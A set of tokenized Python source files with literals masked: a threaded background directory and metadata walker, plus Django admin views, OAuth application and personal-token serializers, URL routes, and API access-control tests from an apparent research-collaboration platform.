<s> '''<STR_LIT>''' <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> import os <EOL> import threading <EOL> import urllib <EOL> import uuid <EOL> pause_lock = threading . Lock ( ) <EOL> pause_condition = threading . Condition ( pause_lock ) <EOL> THREAD_RUNNING = "<STR_LIT>" <EOL> THREAD_STOP = "<STR_LIT>" <EOL> THREAD_STOPPING = "<STR_LIT>" <EOL> THREAD_PAUSE = "<STR_LIT>" <EOL> THREAD_RESUME = "<STR_LIT>" <EOL> class InterruptException ( Exception ) : <EOL> def __init__ ( self , * args ) : <EOL> super ( self . __class__ , self ) . __init__ ( * args ) <EOL> class Checkpoint ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . state = THREAD_RUNNING <EOL> def set_state ( self , state ) : <EOL> with pause_lock : <EOL> if state == THREAD_RESUME : <EOL> state = THREAD_RUNNING <EOL> self . state = state <EOL> pause_condition . notify_all ( ) <EOL> def wait ( self ) : <EOL> with pause_lock : <EOL> if self . state == THREAD_STOP : <EOL> raise InterruptException ( ) <EOL> while self . state == THREAD_PAUSE : <EOL> pause_condition . wait ( ) <EOL> exts_that_need_allow_open_files = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def get_metadata ( path ) : <EOL> import subimager . client as C <EOL> import subimager . omexml as O <EOL> if path . lower ( ) . endswith ( exts_that_need_allow_open_files ) : <EOL> result = C . get_metadata ( path , allowopenfiles = "<STR_LIT:yes>" ) <EOL> else : <EOL> result = C . get_metadata ( path ) <EOL> if result is not None : <EOL> return O . OMEXML ( result ) <EOL> return None <EOL> def walk_in_background ( path , callback_fn , completed_fn = None , metadata_fn = None ) : <EOL> '''<STR_LIT>''' <EOL> checkpoint = Checkpoint ( ) <EOL> def report ( dirpath , dirnames , filenames ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> callback_fn ( dirpath , dirnames , filenames ) <EOL> def metadata_report ( path , metadata ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> metadata_fn ( path , metadata ) <EOL> def complete ( ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> completed_fn ( ) <EOL> def fn ( ) : <EOL> try : <EOL> path_list = [ ] <EOL> for dirpath , dirnames , filenames in os . walk ( path ) : <EOL> checkpoint . wait ( ) <EOL> if len ( filenames ) == <NUM_LIT:0> : <EOL> continue <EOL> import wx <EOL> wx . CallAfter ( report , dirpath , dirnames , filenames ) <EOL> if metadata_fn is not None : <EOL> path_list += [ os . path . join ( dirpath , filename ) <EOL> for filename in filenames ] <EOL> for subpath in sorted ( path_list ) : <EOL> checkpoint . wait ( ) <EOL> try : <EOL> metadata = get_metadata ( "<STR_LIT>" + urllib . pathname2url ( subpath ) ) <EOL> import wx <EOL> wx . CallAfter ( metadata_report , subpath , metadata ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % subpath ) <EOL> except InterruptException : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> finally : <EOL> if completed_fn is not None : <EOL> import wx <EOL> wx . CallAfter ( complete ) <EOL> thread = threading . Thread ( target = fn ) <EOL> thread . setDaemon ( True ) <EOL> thread . start ( ) <EOL> return checkpoint . set_state <EOL> def get_metadata_in_background ( pathnames , fn_callback , fn_completed = None ) : <EOL> '''<STR_LIT>''' <EOL> checkpoint = Checkpoint ( ) <EOL> def metadata_fn ( path , metadata ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> fn_callback ( path , metadata ) <EOL> def completion_fn ( ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> fn_completed ( ) <EOL> def fn ( ) : <EOL> try : <EOL> for path in pathnames : <EOL> checkpoint . wait ( ) <EOL> try : <EOL> if not path . startswith ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" + urllib . pathname2url ( path ) <EOL> else : <EOL> url = path <EOL> metadata = get_metadata ( url ) <EOL> import wx <EOL> wx . CallAfter ( metadata_fn , path , metadata ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % path ) <EOL> except InterruptException : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> finally : <EOL> if fn_completed is not None : <EOL> wx . CallAfter ( completion_fn ) <EOL> thread = threading . Thread ( target = fn ) <EOL> thread . start ( ) <EOL> return checkpoint . set_state <EOL> class WalkCollection ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , fn_on_completed ) : <EOL> self . fn_on_completed = fn_on_completed <EOL> self . stop_functions = { } <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_STOP <EOL> def on_complete ( self , uid ) : <EOL> if self . stop_functions . has_key ( uid ) : <EOL> del self . stop_functions [ uid ] <EOL> if len ( self . stop_functions ) == <NUM_LIT:0> : <EOL> self . state = THREAD_STOP <EOL> self . fn_on_completed ( ) <EOL> def walk_in_background ( self , path , callback_fn , metadata_fn = None ) : <EOL> if self . state == THREAD_PAUSE : <EOL> self . paused_tasks . append ( <EOL> lambda path , callback_fn , metadata_fn : <EOL> self . walk_in_background ( path , callback_fn , metadata_fn ) ) <EOL> else : <EOL> key = uuid . uuid4 ( ) <EOL> fn_on_complete = lambda key = key : self . on_complete ( key ) <EOL> self . stop_functions [ key ] = walk_in_background ( <EOL> path , callback_fn , fn_on_complete , metadata_fn ) <EOL> if self . state == THREAD_STOP : <EOL> self . state = THREAD_RUNNING <EOL> def get_metadata_in_background ( self , pathnames , fn_callback ) : <EOL> if self . state == THREAD_PAUSE : <EOL> self . paused_tasks . append ( <EOL> lambda pathnames , fn_callback : <EOL> self . get_metadata_in_background ( pathnames , fn_callback ) ) <EOL> else : <EOL> key = uuid . uuid4 ( ) <EOL> fn_on_complete = lambda key = key : self . on_complete ( key ) <EOL> self . stop_functions [ key ] = get_metadata_in_background ( <EOL> pathnames , fn_callback , fn_on_complete ) <EOL> def get_state ( self ) : <EOL> return self . state <EOL> def pause ( self ) : <EOL> if self . state == THREAD_RUNNING : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_PAUSE ) <EOL> self . state = THREAD_PAUSE <EOL> def resume ( self ) : <EOL> if self . state == THREAD_PAUSE : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_RESUME ) <EOL> for fn_task in self . paused_tasks : <EOL> fn_task ( ) <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_RUNNING <EOL> def stop ( self ) : <EOL> if self . state in ( THREAD_RUNNING , THREAD_PAUSE ) : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_STOP ) <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_STOPPING </s>
<s> import os <EOL> SYSTEM_CONFIG_NAME = "<STR_LIT>" . upper ( ) + "<STR_LIT>" <EOL> SYSTEM_CONFIG_PATH = "<STR_LIT>" <EOL> env_config = os . environ . get ( SYSTEM_CONFIG_NAME ) <EOL> if env_config : <EOL> SYSTEM_CONFIG_PATH = "<STR_LIT>" + env_config <EOL> SYSTEM_BLUEPRINTS = ( <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> from django . views . generic import ListView , DeleteView <EOL> from django . shortcuts import redirect <EOL> from django . views . defaults import page_not_found <EOL> from modularodm import Q <EOL> from website . models import Node , User , NodeLog <EOL> from admin . base . views import GuidFormView , GuidView <EOL> from admin . base . utils import OSFAdmin <EOL> from admin . common_auth . logs import ( <EOL> update_admin_log , <EOL> NODE_REMOVED , <EOL> NODE_RESTORED , <EOL> CONTRIBUTOR_REMOVED <EOL> ) <EOL> from admin . nodes . templatetags . node_extras import reverse_node <EOL> from admin . nodes . serializers import serialize_node , serialize_simple_user <EOL> class NodeFormView ( OSFAdmin , GuidFormView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> object_type = '<STR_LIT>' <EOL> @ property <EOL> def success_url ( self ) : <EOL> return reverse_node ( self . guid ) <EOL> class NodeRemoveContributorView ( OSFAdmin , DeleteView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> node , user = self . get_object ( ) <EOL> if node . remove_contributor ( user , None , log = False ) : <EOL> update_admin_log ( <EOL> user_id = self . request . user . id , <EOL> object_id = node . pk , <EOL> object_repr = '<STR_LIT>' , <EOL> message = '<STR_LIT>' . format ( <EOL> user . pk , node . pk <EOL> ) , <EOL> action_flag = CONTRIBUTOR_REMOVED <EOL> ) <EOL> osf_log = NodeLog ( <EOL> action = NodeLog . CONTRIB_REMOVED , <EOL> user = None , <EOL> params = { <EOL> '<STR_LIT>' : node . parent_id , <EOL> '<STR_LIT>' : node . pk , <EOL> '<STR_LIT>' : user . pk <EOL> } , <EOL> date = datetime . utcnow ( ) , <EOL> should_hide = True , <EOL> ) <EOL> osf_log . save ( ) <EOL> except AttributeError : <EOL> return page_not_found ( <EOL> request , <EOL> AttributeError ( <EOL> '<STR_LIT>' . format ( <EOL> self . context_object_name . title ( ) , <EOL> kwargs . get ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> return redirect ( reverse_node ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> node , user = kwargs . get ( '<STR_LIT:object>' ) <EOL> context . setdefault ( '<STR_LIT>' , node . pk ) <EOL> context . setdefault ( '<STR_LIT:user>' , serialize_simple_user ( ( user . pk , None ) ) ) <EOL> return super ( NodeRemoveContributorView , self ) . get_context_data ( ** context ) <EOL> def get_object ( self , queryset = None ) : <EOL> return ( Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) , <EOL> User . load ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> class NodeDeleteView ( OSFAdmin , DeleteView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> object = None <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> node = self . get_object ( ) <EOL> flag = None <EOL> osf_flag = None <EOL> message = None <EOL> if node . is_deleted : <EOL> node . is_deleted = False <EOL> node . deleted_date = None <EOL> flag = NODE_RESTORED <EOL> message = '<STR_LIT>' . format ( node . pk ) <EOL> osf_flag = NodeLog . NODE_CREATED <EOL> elif not node . is_registration : <EOL> node . is_deleted = True <EOL> node . deleted_date = datetime . utcnow ( ) <EOL> flag = NODE_REMOVED <EOL> message = '<STR_LIT>' . format ( node . pk ) <EOL> osf_flag = NodeLog . NODE_REMOVED <EOL> node . save ( ) <EOL> if flag is not None : <EOL> update_admin_log ( <EOL> user_id = self . request . user . id , <EOL> object_id = node . pk , <EOL> object_repr = '<STR_LIT>' , <EOL> message = message , <EOL> action_flag = flag <EOL> ) <EOL> if osf_flag is not None : <EOL> osf_log = NodeLog ( <EOL> action = osf_flag , <EOL> user = None , <EOL> params = { <EOL> '<STR_LIT>' : node . parent_id , <EOL> } , <EOL> date = datetime . utcnow ( ) , <EOL> should_hide = True , <EOL> ) <EOL> osf_log . save ( ) <EOL> except AttributeError : <EOL> return page_not_found ( <EOL> request , <EOL> AttributeError ( <EOL> '<STR_LIT>' . format ( <EOL> self . context_object_name . title ( ) , <EOL> kwargs . get ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> return redirect ( reverse_node ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> context . setdefault ( '<STR_LIT>' , kwargs . get ( '<STR_LIT:object>' ) . pk ) <EOL> return super ( NodeDeleteView , self ) . get_context_data ( ** context ) <EOL> def get_object ( self , queryset = None ) : <EOL> return Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) <EOL> class NodeView ( OSFAdmin , GuidView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_object ( self , queryset = None ) : <EOL> return serialize_node ( Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> class RegistrationListView ( OSFAdmin , ListView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> paginate_by = <NUM_LIT:10> <EOL> paginate_orphans = <NUM_LIT:1> <EOL> ordering = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_queryset ( self ) : <EOL> query = ( <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> ) <EOL> return Node . find ( query ) . sort ( self . ordering ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> query_set = kwargs . pop ( '<STR_LIT>' , self . object_list ) <EOL> page_size = self . get_paginate_by ( query_set ) <EOL> paginator , page , query_set , is_paginated = self . paginate_queryset ( <EOL> query_set , page_size ) <EOL> return { <EOL> '<STR_LIT>' : map ( serialize_node , query_set ) , <EOL> '<STR_LIT>' : page , <EOL> } </s>
<s> from django . core . validators import URLValidator <EOL> from rest_framework import serializers as ser <EOL> from modularodm import Q <EOL> from website . models import ApiOAuth2Application <EOL> from api . base . serializers import JSONAPISerializer , LinksField , IDField , TypeField <EOL> from api . base . utils import absolute_reverse <EOL> class ApiOAuthApplicationBaseSerializer ( JSONAPISerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> client_id = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> client_secret = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> links = LinksField ( { <EOL> '<STR_LIT:html>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> def absolute_url ( self , obj ) : <EOL> return obj . absolute_url <EOL> def get_absolute_url ( self , obj ) : <EOL> return obj . get_absolute_url ( ) <EOL> def reset_url ( self , obj ) : <EOL> return absolute_reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : obj . client_id } ) <EOL> class Meta : <EOL> type_ = '<STR_LIT>' <EOL> class ApiOAuth2ApplicationSerializer ( ApiOAuthApplicationBaseSerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> name = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> description = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = False , <EOL> allow_blank = True ) <EOL> home_url = ser . CharField ( help_text = "<STR_LIT>" , <EOL> required = True , <EOL> validators = [ URLValidator ( ) ] , <EOL> label = "<STR_LIT>" ) <EOL> callback_url = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True , <EOL> validators = [ URLValidator ( ) ] , <EOL> label = "<STR_LIT>" ) <EOL> owner = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True , <EOL> source = '<STR_LIT>' ) <EOL> date_created = ser . DateTimeField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> def create ( self , validated_data ) : <EOL> instance = ApiOAuth2Application ( ** validated_data ) <EOL> instance . save ( ) <EOL> return instance <EOL> def update ( self , instance , validated_data ) : <EOL> assert isinstance ( instance , ApiOAuth2Application ) , '<STR_LIT>' <EOL> for attr , value in validated_data . iteritems ( ) : <EOL> setattr ( instance , attr , value ) <EOL> instance . save ( ) <EOL> return instance <EOL> class ApiOAuth2ApplicationDetailSerializer ( ApiOAuth2ApplicationSerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , required = True , help_text = '<STR_LIT>' ) <EOL> class ApiOAuth2ApplicationResetSerializer ( ApiOAuth2ApplicationDetailSerializer ) : <EOL> def absolute_url ( self , obj ) : <EOL> obj = ApiOAuth2Application . find_one ( Q ( '<STR_LIT>' , '<STR_LIT>' , obj [ '<STR_LIT>' ] ) ) <EOL> return obj . absolute_url <EOL> def reset_url ( self , obj ) : <EOL> return absolute_reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : obj [ '<STR_LIT>' ] } ) </s>
<s> from django . conf . urls import url <EOL> from api . collections import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . CollectionList . as_view ( ) , name = views . CollectionList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . CollectionDetail . as_view ( ) , name = views . CollectionDetail . view_name ) , <EOL> url ( r'<STR_LIT>' , views . LinkedNodesList . as_view ( ) , name = views . LinkedNodesList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . NodeLinksList . as_view ( ) , name = views . NodeLinksList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . NodeLinksDetail . as_view ( ) , name = views . NodeLinksDetail . view_name ) , <EOL> url ( r'<STR_LIT>' , views . CollectionLinkedNodesRelationship . as_view ( ) , name = views . CollectionLinkedNodesRelationship . view_name ) , <EOL> ] </s>
<s> from rest_framework import serializers as ser <EOL> from rest_framework import exceptions <EOL> from framework . auth . oauth_scopes import public_scopes <EOL> from website . models import ApiOAuth2PersonalToken <EOL> from api . base . serializers import JSONAPISerializer , LinksField , IDField , TypeField <EOL> class ApiOAuth2PersonalTokenSerializer ( JSONAPISerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> name = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> owner = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True , <EOL> source = '<STR_LIT>' ) <EOL> scopes = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> token_id = ser . CharField ( read_only = True , allow_blank = True ) <EOL> class Meta : <EOL> type_ = '<STR_LIT>' <EOL> links = LinksField ( { <EOL> '<STR_LIT:html>' : '<STR_LIT>' <EOL> } ) <EOL> def absolute_url ( self , obj ) : <EOL> return obj . absolute_url <EOL> def get_absolute_url ( self , obj ) : <EOL> return self . absolute_url ( obj ) <EOL> def to_representation ( self , obj , envelope = '<STR_LIT:data>' ) : <EOL> data = super ( ApiOAuth2PersonalTokenSerializer , self ) . to_representation ( obj , envelope = envelope ) <EOL> if not self . context [ '<STR_LIT>' ] . method == '<STR_LIT:POST>' : <EOL> if '<STR_LIT:data>' in data : <EOL> data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> else : <EOL> data [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> return data <EOL> def create ( self , validated_data ) : <EOL> validate_requested_scopes ( validated_data ) <EOL> instance = ApiOAuth2PersonalToken ( ** validated_data ) <EOL> instance . save ( ) <EOL> return instance <EOL> def update ( self , instance , validated_data ) : <EOL> validate_requested_scopes ( validated_data ) <EOL> assert isinstance ( instance , ApiOAuth2PersonalToken ) , '<STR_LIT>' <EOL> instance . deactivate ( save = False ) <EOL> instance . reload ( ) <EOL> for attr , value in validated_data . iteritems ( ) : <EOL> if attr == '<STR_LIT>' : <EOL> continue <EOL> else : <EOL> setattr ( instance , attr , value ) <EOL> instance . save ( ) <EOL> return instance <EOL> def validate_requested_scopes ( validated_data ) : <EOL> scopes_set = set ( validated_data [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' ) ) <EOL> for scope in scopes_set : <EOL> if scope not in public_scopes or not public_scopes [ scope ] . is_public : <EOL> raise exceptions . ValidationError ( '<STR_LIT>' ) </s>
<s> from nose . tools import * <EOL> from tests . base import ApiTestCase <EOL> from tests . factories import InstitutionFactory , AuthUserFactory , RegistrationFactory , RetractedRegistrationFactory <EOL> from framework . auth import Auth <EOL> from api . base . settings . defaults import API_BASE <EOL> class TestInstitutionRegistrationList ( ApiTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInstitutionRegistrationList , self ) . setUp ( ) <EOL> self . institution = InstitutionFactory ( ) <EOL> self . registration1 = RegistrationFactory ( is_public = True , is_registration = True ) <EOL> self . registration1 . primary_institution = self . institution <EOL> self . registration1 . save ( ) <EOL> self . user1 = AuthUserFactory ( ) <EOL> self . user2 = AuthUserFactory ( ) <EOL> self . registration2 = RegistrationFactory ( creator = self . user1 , is_public = False , is_registration = True ) <EOL> self . registration2 . primary_institution = self . institution <EOL> self . registration2 . add_contributor ( self . user2 , auth = Auth ( self . user1 ) ) <EOL> self . registration2 . save ( ) <EOL> self . registration3 = RegistrationFactory ( creator = self . user2 , is_public = False , is_registration = True ) <EOL> self . registration3 . primary_institution = self . institution <EOL> self . registration3 . save ( ) <EOL> self . institution_node_url = '<STR_LIT>' . format ( API_BASE , self . institution . _id ) <EOL> def test_return_all_public_nodes ( self ) : <EOL> res = self . app . get ( self . institution_node_url ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_not_in ( self . registration2 . _id , ids ) <EOL> assert_not_in ( self . registration3 . _id , ids ) <EOL> def test_return_private_nodes_with_auth ( self ) : <EOL> res = self . app . get ( self . institution_node_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_in ( self . registration2 . _id , ids ) <EOL> assert_not_in ( self . registration3 . _id , ids ) <EOL> def test_return_private_nodes_mixed_auth ( self ) : <EOL> res = self . app . get ( self . institution_node_url , auth = self . user2 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_in ( self . registration1 . _id , ids ) <EOL> assert_in ( self . registration2 . _id , ids ) <EOL> assert_in ( self . registration3 . _id , ids ) <EOL> def test_doesnt_return_retractions_without_auth ( self ) : <EOL> self . registration2 . is_public = True <EOL> self . registration2 . save ( ) <EOL> retraction = RetractedRegistrationFactory ( registration = self . registration2 , user = self . user1 ) <EOL> assert_true ( self . registration2 . is_retracted ) <EOL> res = self . app . get ( self . institution_node_url ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_not_in ( self . registration2 . _id , ids ) <EOL> def test_doesnt_return_retractions_with_auth ( self ) : <EOL> retraction = RetractedRegistrationFactory ( registration = self . registration2 , user = self . user1 ) <EOL> assert_true ( self . registration2 . is_retracted ) <EOL> res = self . app . get ( self . institution_node_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> ids = [ each [ '<STR_LIT:id>' ] for each in res . json [ '<STR_LIT:data>' ] ] <EOL> assert_not_in ( self . registration2 . _id , ids ) </s>
<s> import copy <EOL> import mock <EOL> from nose . tools import * <EOL> from website . models import User , ApiOAuth2PersonalToken <EOL> from website . util import api_v2_url <EOL> from tests . base import ApiTestCase <EOL> from tests . factories import ApiOAuth2PersonalTokenFactory , AuthUserFactory <EOL> TOKEN_LIST_URL = api_v2_url ( '<STR_LIT>' , base_route = '<STR_LIT:/>' ) <EOL> def _get_token_detail_route ( token ) : <EOL> path = "<STR_LIT>" . format ( token . _id ) <EOL> return api_v2_url ( path , base_route = '<STR_LIT:/>' ) <EOL> class TestTokenDetail ( ApiTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestTokenDetail , self ) . setUp ( ) <EOL> self . user1 = AuthUserFactory ( ) <EOL> self . user2 = AuthUserFactory ( ) <EOL> self . user1_token = ApiOAuth2PersonalTokenFactory ( owner = self . user1 , user_id = self . user1 . _id ) <EOL> self . user1_token_url = _get_token_detail_route ( self . user1_token ) <EOL> self . missing_type = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . incorrect_type = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . injected_scope = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . nonsense_scope = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> self . correct = { <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> } <EOL> def test_owner_can_view ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_equal ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT:id>' ] , self . user1_token . _id ) <EOL> def test_non_owner_cant_view ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user2 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_returns_401_when_not_logged_in ( self ) : <EOL> res = self . app . get ( self . user1_token_url , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_owner_can_delete ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> def test_non_owner_cant_delete ( self ) : <EOL> res = self . app . delete ( self . user1_token_url , <EOL> auth = self . user2 . auth , <EOL> expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deleting_tokens_makes_api_view_inaccessible ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth , expect_errors = True ) <EOL> assert_equal ( res . status_code , <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_updating_one_field_should_not_blank_others_on_patch_update ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> user1_token = self . user1_token <EOL> new_name = "<STR_LIT>" <EOL> res = self . app . patch_json_api ( self . user1_token_url , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : <EOL> { '<STR_LIT:name>' : new_name , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } } , auth = self . user1 . auth ) <EOL> user1_token . reload ( ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_dict_contains_subset ( { '<STR_LIT>' : user1_token . owner . _id , <EOL> '<STR_LIT:name>' : new_name , <EOL> '<STR_LIT>' : '<STR_LIT:{}>' . format ( user1_token . scopes ) , <EOL> } , <EOL> res . json [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) <EOL> assert_equal ( res . json [ '<STR_LIT:data>' ] [ '<STR_LIT:id>' ] , user1_token . _id ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_updating_an_instance_does_not_change_the_number_of_instances ( self , mock_revoke ) : <EOL> mock_revoke . return_value = True <EOL> new_name = "<STR_LIT>" <EOL> res = self . app . patch_json_api ( self . user1_token_url , <EOL> { '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { "<STR_LIT:name>" : new_name , '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : self . user1_token . _id , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } } , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> list_url = TOKEN_LIST_URL <EOL> res = self . app . get ( list_url , auth = self . user1 . auth ) <EOL> assert_equal ( res . status_code , <NUM_LIT:200> ) <EOL> assert_equal ( len ( res . json [ '<STR_LIT:data>' ] ) , <EOL> <NUM_LIT:1> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_deleting_token_flags_instance_inactive ( self , mock_method ) : <EOL> mock_method . return_value ( True ) <EOL> res = self . app . delete ( self . user1_token_url , auth = self . user1 . auth ) <EOL> self . user1_token . reload ( ) <EOL> assert_false ( self . user1_token . is_active ) <EOL> def test_read_does_not_return_token_id ( self ) : <EOL> res = self . app . get ( self . user1_token_url , auth = self . user1 . auth ) 